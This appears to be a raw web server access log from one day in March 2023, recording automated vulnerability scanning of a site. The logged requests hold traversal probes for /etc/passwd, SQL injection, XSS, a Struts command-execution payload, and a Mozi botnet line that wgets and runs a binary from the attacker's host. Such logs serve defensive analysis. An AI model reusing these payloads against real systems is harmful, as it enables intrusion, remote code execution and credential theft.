72.44.65.82 - - [08/Mar/2023:12:49:56 +0530] "GET /adserve/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1" 404 1048
72.44.65.82 - - [08/Mar/2023:12:50:18 +0530] "GET /revive/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1" 404 1046
72.44.65.82 - - [08/Mar/2023:12:50:19 +0530] "GET /www/delivery/lg.php?dest=http://interact.sh HTTP/1.1" 404 1032
72.44.65.82 - - [08/Mar/2023:12:51:43 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_beeheard HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:12:54:16 +0530] "GET /wp-json/wp/v2/users/ HTTP/1.1" 404 1034
8.219.239.111 - - [08/Mar/2023:12:57:10 +0530] "GET / HTTP/1.0" 200 11230
8.219.239.111 - - [08/Mar/2023:12:57:11 +0530] "GET / HTTP/1.1" 200 11250
8.219.239.111 - - [08/Mar/2023:12:57:12 +0530] "GET /sitemap.xml HTTP/1.1" 404 1016
8.219.239.111 - - [08/Mar/2023:12:57:12 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
8.219.239.111 - - [08/Mar/2023:12:57:12 +0530] "GET /robots.txt HTTP/1.1" 404 1014
8.219.239.111 - - [08/Mar/2023:12:57:12 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
162.243.129.10 - - [08/Mar/2023:12:57:18 +0530] "GET / HTTP/1.1" 200 11250
162.243.129.10 - - [08/Mar/2023:12:57:24 +0530] "GET / HTTP/1.1" 200 11250
162.243.145.17 - - [08/Mar/2023:12:58:13 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:13:00:52 +0530] "GET /lab.html?vpath=//interact.sh HTTP/1.1" 404 1010
72.44.65.82 - - [08/Mar/2023:13:03:58 +0530] "GET /jmx-console/ HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:13:03:59 +0530] "GET /jmx-console/ HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:13:04:00 +0530] "GET /jmx-console/ HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:13:04:24 +0530] "GET /jmx-console/ HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:13:04:47 +0530] "GET /jmx-console/ HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:13:04:51 +0530] "GET /jmx-console/ HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:13:04:51 +0530] "GET /jmx-console/ HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:13:04:53 +0530] "GET /jmx-console/ HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:13:05:01 +0530] "GET /jmx-console/ HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:13:05:41 +0530] "GET /jmx-console/ HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:13:05:52 +0530] "GET /jmx-console/ HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:13:06:00 +0530] "GET /jmx-console/ HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:13:06:17 +0530] "GET /jmx-console/ HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:13:06:21 +0530] "GET /jmx-console/ HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:13:06:22 +0530] "GET /jmx-console/ HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:13:06:23 +0530] "GET /jmx-console/ HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:13:06:24 +0530] "GET /jmx-console/ HTTP/1.1" 404 1018
90.151.171.106 - - [08/Mar/2023:13:07:42 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:13:07:42 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:13:07:42 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:13:07:42 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:13:07:42 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:13:07:47 +0530] "GET /db.xml HTTP/1.1" 404 1006
90.151.171.106 - - [08/Mar/2023:13:07:47 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:13:07:47 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:13:07:47 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:13:11:24 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:13:19:28 +0530] "GET /prweb/PRAuth/app/default/ HTTP/1.1" 404 1044
72.44.65.82 - - [08/Mar/2023:13:27:26 +0530] "GET /AvalancheWeb/image?imageFilePath=C:/windows/win.ini HTTP/1.1" 404 1030
72.44.65.82 - - [08/Mar/2023:13:27:55 +0530] "GET /module/smartblog/archive?day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-&month=1&year=1 HTTP/1.1" 404 1042
199.195.248.153 - - [08/Mar/2023:13:28:28 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:13:34:02 +0530] "GET /static/../../../a/../../../../etc/passwd HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:13:36:11 +0530] "GET /s/2MgieD2j0QH94U27qDUJX3KMEf9/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1" 404 1192
72.44.65.82 - - [08/Mar/2023:13:38:33 +0530] "POST /ubus/ HTTP/1.1" 404 1004
72.44.65.82 - - [08/Mar/2023:13:42:49 +0530] "GET /?p=1&xsg-format=yyy&xsg-page=pp&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-type=zz HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:13:46:44 +0530] "GET /js/routing?callback=fos.Router.setDatafoobarfoo HTTP/1.1" 404 1014
90.151.171.108 - - [08/Mar/2023:13:52:13 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.108 - - [08/Mar/2023:13:52:13 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.108 - - [08/Mar/2023:13:52:13 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:13:52:13 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:13:52:18 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [08/Mar/2023:13:52:18 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [08/Mar/2023:13:52:18 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:13:52:18 +0530] "-" 400 -
92.118.39.82 - - [08/Mar/2023:13:53:46 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:13:55:38 +0530] "POST /ws_utc/resources/setting/keystore HTTP/1.1" 404 1060
72.44.65.82 - - [08/Mar/2023:14:01:24 +0530] "GET /phpwiki/index.php/passwd HTTP/1.1" 404 1042
72.44.65.82 - - [08/Mar/2023:14:05:20 +0530] "POST /session/create HTTP/1.1" 404 1022
72.44.65.82 - - [08/Mar/2023:14:09:49 +0530] "GET /CMSInstall/install.aspx HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:14:11:55 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_userstatus HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:14:14:57 +0530] "GET /config/configuration.yml HTTP/1.1" 404 1042
90.151.171.106 - - [08/Mar/2023:14:20:16 +0530] "CONNECT fingerprints.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:14:20:16 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:14:20:16 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:14:20:16 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:14:20:16 +0530] "GET /ip?Z78909657371Q1 HTTP/1.1" 404 998
90.151.171.106 - - [08/Mar/2023:14:20:21 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:14:20:21 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:14:20:21 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:14:21:41 +0530] "GET /api/image/cover-upload?filename=../appsettings.json HTTP/1.1" 404 1038
72.44.65.82 - - [08/Mar/2023:14:22:52 +0530] "GET /api/config HTTP/1.1" 404 1014
72.44.65.82 - - [08/Mar/2023:14:27:43 +0530] "GET /images/..%2finfo.html HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:14:30:16 +0530] "GET /wp-content/plugins/wpcargo/includes/2Mgie0QByq5dvlQhkF4j7pZYSZj.php HTTP/1.1" 404 1128
72.44.65.82 - - [08/Mar/2023:14:30:28 +0530] "POST /wp-content/plugins/wpcargo/includes/2Mgie0QByq5dvlQhkF4j7pZYSZj.php?1=var_dump HTTP/1.1" 404 1128
72.44.65.82 - - [08/Mar/2023:14:31:16 +0530] "GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1" 404 1976
72.44.65.82 - - [08/Mar/2023:14:31:31 +0530] "GET /boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1 HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:14:32:07 +0530] "GET /wp-content/plugins/profile-builder/assets/misc/fallback-page.php?message=Not+Found&site_name=404&site_url=javascript:alert(document.domain) HTTP/1.1" 404 1122
72.44.65.82 - - [08/Mar/2023:14:34:47 +0530] "GET /admin/ HTTP/1.1" 404 1006
72.44.65.82 - - [08/Mar/2023:14:34:48 +0530] "GET /solr/admin/ HTTP/1.1" 404 1016
199.195.248.153 - - [08/Mar/2023:14:37:24 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:14:38:23 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:14:38:24 +0530] "GET /wp-content/uploads/workreap-temp/2MgieKHRTVU21n0s7nEpmCt3zUJ.php HTTP/1.1" 404 1122
72.44.65.82 - - [08/Mar/2023:14:40:46 +0530] "GET /js../.git/config HTTP/1.1" 404 1026
128.14.133.58 - - [08/Mar/2023:14:42:43 +0530] "GET / HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:14:48:54 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:14:48:54 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:14:48:59 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:14:48:59 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:14:49:01 +0530] "POST /index.php?s=captcha HTTP/1.1" 404 1012
90.151.171.106 - - [08/Mar/2023:14:49:04 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:14:49:04 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:14:49:09 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:14:49:09 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:14:57:57 +0530] "GET /assets/app/something/services/AppModule.class/ HTTP/1.1" 404 1086
72.44.65.82 - - [08/Mar/2023:14:58:32 +0530] "POST /install/install.php?step=4 HTTP/1.1" 404 1032
72.44.65.82 - - [08/Mar/2023:14:58:40 +0530] "GET /wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1076
72.44.65.82 - - [08/Mar/2023:15:02:01 +0530] "GET /wavemaker/studioService.download?inUrl=file///etc/passwd&method=getContent HTTP/1.1" 404 1058
72.44.65.82 - - [08/Mar/2023:15:14:36 +0530] "GET /monitoring HTTP/1.1" 404 1014
72.44.65.82 - - [08/Mar/2023:15:14:44 +0530] "GET /docpicker/internal_proxy/http/interact.sh HTTP/1.1" 404 1076
72.44.65.82 - - [08/Mar/2023:15:15:54 +0530] "GET /ajax.php?entriesPerPage=15&f=getPipelineJobOrder&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0&joborderID=50&page=0&sortBy=dateCreatedInt&sortDirection=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1010
72.44.65.82 - - [08/Mar/2023:15:16:28 +0530] "GET /?action=login&controller=AuthController HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:15:20:08 +0530] "GET /opc/v1/instance HTTP/1.1" 404 1024
72.44.65.82 - - [08/Mar/2023:15:20:08 +0530] "GET /opc/v1/instance HTTP/1.1" 404 1024
72.44.65.82 - - [08/Mar/2023:15:23:17 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_janews HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:15:23:31 +0530] "GET /webadmin/authportal/bounce.php?url=https://interact.sh/ HTTP/1.1" 404 1054
72.44.65.82 - - [08/Mar/2023:15:23:33 +0530] "POST /json-rpc/ HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:15:25:11 +0530] "GET null null" 400 -
72.44.65.82 - - [08/Mar/2023:15:28:12 +0530] "GET /hp/device/webAccess/index.htm?content=security HTTP/1.1" 404 1052
72.44.65.82 - - [08/Mar/2023:15:31:41 +0530] "GET /pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei HTTP/1.1" 404 1040
90.151.171.106 - - [08/Mar/2023:15:32:45 +0530] "CONNECT fingerprints.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:15:32:45 +0530] "CONNECT fingerprints.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:15:32:45 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:15:32:45 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:15:32:50 +0530] "GET /ip?Z70629657371Q1 HTTP/1.1" 404 998
90.151.171.106 - - [08/Mar/2023:15:32:50 +0530] "GET /ip?Z78909657371Q1 HTTP/1.1" 404 998
90.151.171.106 - - [08/Mar/2023:15:32:50 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:15:32:50 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:15:35:30 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_smartsite HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:15:42:54 +0530] "GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:15:43:33 +0530] "site cpfr null" 400 -
72.44.65.82 - - [08/Mar/2023:15:48:32 +0530] "GET /public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 -
128.14.141.34 - - [08/Mar/2023:15:49:25 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:15:50:30 +0530] "POST /login.cgi HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:15:50:30 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:15:50:31 +0530] "GET /?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:15:51:47 +0530] "GET null null" 400 -
72.44.65.82 - - [08/Mar/2023:15:56:05 +0530] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 1096
72.44.65.82 - - [08/Mar/2023:15:56:56 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:15:57:03 +0530] "GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1" 404 1082
72.44.65.82 - - [08/Mar/2023:15:59:24 +0530] "GET /wp-content/plugins/gwyns-imagemap-selector/popup.php?class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&id=1 HTTP/1.1" 404 1098
72.44.65.82 - - [08/Mar/2023:16:05:46 +0530] "GET /search?search_key=%7B%7B1337*1338%7D%7D HTTP/1.1" 404 1006
72.44.65.82 - - [08/Mar/2023:16:07:46 +0530] "POST / HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:16:07:50 +0530] "GET /2MgidySp4xCPDcZzaLLGNLXb9Ic.php%5Cx0A HTTP/1.1" 400 -
178.141.237.206 - - [08/Mar/2023:16:08:28 +0530] "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://178.141.237.206:54048/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron HTTP/1.0" 404 1012
72.44.65.82 - - [08/Mar/2023:16:12:15 +0530] "GET /listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1010
90.151.171.108 - - [08/Mar/2023:16:14:03 +0530] "CONNECT fingerprints.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [08/Mar/2023:16:14:03 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [08/Mar/2023:16:14:08 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:16:14:08 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:16:14:13 +0530] "GET /ip?Z70629657371Q1 HTTP/1.1" 404 998
90.151.171.108 - - [08/Mar/2023:16:14:13 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [08/Mar/2023:16:14:18 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:16:14:18 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:16:14:50 +0530] "GET /?layout=/etc/passwd HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:16:17:22 +0530] "POST /wp-json/visualizer/v1/update-chart HTTP/1.1" 404 1062
72.44.65.82 - - [08/Mar/2023:16:18:36 +0530] "GET /Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:16:24:42 +0530] "GET null null" 400 -
72.44.65.82 - - [08/Mar/2023:16:24:43 +0530] "GET null null" 400 -
72.44.65.82 - - [08/Mar/2023:16:29:03 +0530] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00&v=091214175450 HTTP/1.1" 404 1144
72.44.65.82 - - [08/Mar/2023:16:39:34 +0530] "GET /webapi/file/transfer?name=/../../../../../../../../etc/passwd&type=db_backup HTTP/1.1" 404 1034
72.44.65.82 - - [08/Mar/2023:16:40:14 +0530] "GET /bitrix/rk.php?goto=https://interact.sh HTTP/1.1" 404 1020
72.44.65.82 - - [08/Mar/2023:16:40:16 +0530] "GET /bitrix/redirect.php?event1&event2&event3&goto=https://interact.sh HTTP/1.1" 404 1032
46.174.191.30 - - [08/Mar/2023:16:40:28 +0530] "GET / HTTP/1.0" 200 11230
72.44.65.82 - - [08/Mar/2023:16:40:39 +0530] "GET /bitrix/redirect.php?event1=select_product_t1&event2=contributions&goto=https://interact.sh&site_id=s1 HTTP/1.1" 404 1032
72.44.65.82 - - [08/Mar/2023:16:40:40 +0530] "GET /bitrix/redirect.php?event1&event2&event3=download&goto=https://interact.sh HTTP/1.1" 404 1032
72.44.65.82 - - [08/Mar/2023:16:41:04 +0530] "GET /free_time.cgi HTTP/1.1" 404 1020
72.44.65.82 - - [08/Mar/2023:16:41:04 +0530] "GET /bitrix/rk.php?event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh&id=691&site_id=s3 HTTP/1.1" 404 1020
72.44.65.82 - - [08/Mar/2023:16:41:19 +0530] "GET /onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ== HTTP/1.1" 404 1020
72.44.65.82 - - [08/Mar/2023:16:41:21 +0530] "GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2&event3=download&goto=https://interact.sh HTTP/1.1" 404 1032
72.44.65.82 - - [08/Mar/2023:16:41:25 +0530] "GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2&event3=download&goto=https://interact.sh HTTP/1.1" 404 1032
72.44.65.82 - - [08/Mar/2023:16:42:22 +0530] "GET /CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1) HTTP/1.1" 404 1046
72.44.65.82 - - [08/Mar/2023:16:44:19 +0530] "GET /api/v1/data?after=-120&chart=system.cpu&dimensions=iowait&format=json&group=average&gtime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&points=125 HTTP/1.1" 404 1016
72.44.65.82 - - [08/Mar/2023:16:47:03 +0530] "GET /index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:16:48:03 +0530] "GET /index.php?controller=../../../../../../../etc/passwd%00&option=com_svmap HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:16:50:29 +0530] "POST /index.php HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:16:52:06 +0530] "POST /fileDownload?action=downloadBackupFile HTTP/1.1" 404 1018
90.151.171.108 - - [08/Mar/2023:17:04:02 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.108 - - [08/Mar/2023:17:04:02 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [08/Mar/2023:17:04:02 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:17:04:02 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [08/Mar/2023:17:04:02 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:17:04:07 +0530] "-" 400 -
90.151.171.108 - - [08/Mar/2023:17:04:07 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [08/Mar/2023:17:04:07 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:17:10:21 +0530] "GET /_fragment?_path=_controller=phpcredits&flag=-1 HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:17:10:28 +0530] "GET /wp-content/uploads/kaswara/fonts_icon/lqkito/yi.php HTTP/1.1" 404 1096
72.44.65.82 - - [08/Mar/2023:17:11:31 +0530] "GET /api/scrape/kube-system HTTP/1.1" 404 1038
72.44.65.82 - - [08/Mar/2023:17:11:59 +0530] "POST /wp-login.php HTTP/1.1" 404 1018
72.44.65.82 - - [08/Mar/2023:17:12:00 +0530] "GET /ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:17:15:39 +0530] "GET /visualrf/group_list.xml?aps=1&end=500&match&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1040
72.44.65.82 - - [08/Mar/2023:17:22:31 +0530] "GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:17:31:09 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:17:31:09 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [08/Mar/2023:17:31:14 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:17:31:14 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:17:31:19 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:17:31:20 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [08/Mar/2023:17:31:24 +0530] "-" 400 -
90.151.171.106 - - [08/Mar/2023:17:31:25 +0530] "-" 400 -
72.44.65.82 - - [08/Mar/2023:17:32:11 +0530] "GET /2MgidwGhbpoN6nPgUAOIA9PZ6FH.json HTTP/1.1" 404 1058
72.44.65.82 - - [08/Mar/2023:17:36:08 +0530] "USER anonymous " 400 -
72.44.65.82 - - [08/Mar/2023:17:37:21 +0530] "GET /privatekey.key HTTP/1.1" 404 1022
72.44.65.82 - - [08/Mar/2023:17:37:53 +0530] "GET /ssl/localhost.key HTTP/1.1" 404 1028
72.44.65.82 - - [08/Mar/2023:17:38:05 +0530] "GET /id_rsa HTTP/1.1" 404 1006
72.44.65.82 - - [08/Mar/2023:17:38:55 +0530] "GET /config/jwt/private.pem HTTP/1.1" 404 1038
72.44.65.82 - - [08/Mar/2023:17:40:07 +0530] "GET /ssl/103.145.51.236.pem HTTP/1.1" 404 1038
72.44.65.82 - - [08/Mar/2023:17:40:08 +0530] "GET /ssl/103.145.51.236_key.txt HTTP/1.1" 404 1046
72.44.65.82 - - [08/Mar/2023:17:40:11 +0530] "GET /cert/103.145.51.236_key.txt HTTP/1.1" 404 1048
72.44.65.82 - - [08/Mar/2023:17:40:13 +0530] "GET /cert/51.236_key.txt HTTP/1.1" 404 1032
72.44.65.82 - - [08/Mar/2023:17:40:25 +0530] "GET /ssl/private/103.145.51.236_key.pem HTTP/1.1" 404 1062
72.44.65.82 - - [08/Mar/2023:17:40:36 +0530] "GET /certs/103.145.51.236.key HTTP/1.1" 404 1042
72.44.65.82 - - [08/Mar/2023:17:40:47 +0530] "GET /certificates/103.145.51.236_privkey.pem HTTP/1.1" 404 1072
72.44.65.82 - - [08/Mar/2023:17:40:47 +0530] "GET /certs/103.145.51.236.pem HTTP/1.1" 404 1042
72.44.65.82 - - [08/Mar/2023:17:41:29 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_if_surfalert HTTP/1.1" 404 1012
72.44.65.82 - - [08/Mar/2023:17:42:47 +0530] "POST /admin/ajax.php?action=login HTTP/1.1" 404 1022
72.44.65.82 - - [08/Mar/2023:17:50:56 +0530] "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:17:50:57 +0530] "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1" 404 1120
72.44.65.82 - - [08/Mar/2023:17:50:58 +0530] "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:17:50:59 +0530] "POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1" 404 1052
72.44.65.82 - - [08/Mar/2023:17:51:02 +0530] "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini HTTP/1.1" 404 1232
72.44.65.82 - - [08/Mar/2023:17:51:03 +0530] "GET /?redirect=..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1" 200 11250
72.44.65.82 - - [08/Mar/2023:17:51:27 +0530] "GET /..///////..////..//////windows/win.ini HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:17:51:28 +0530] "GET /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini HTTP/1.1" 400 -
72.44.65.82 - - [08/Mar/2023:17:51:28 +0530] "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini HTTP/1.1" 404 1102
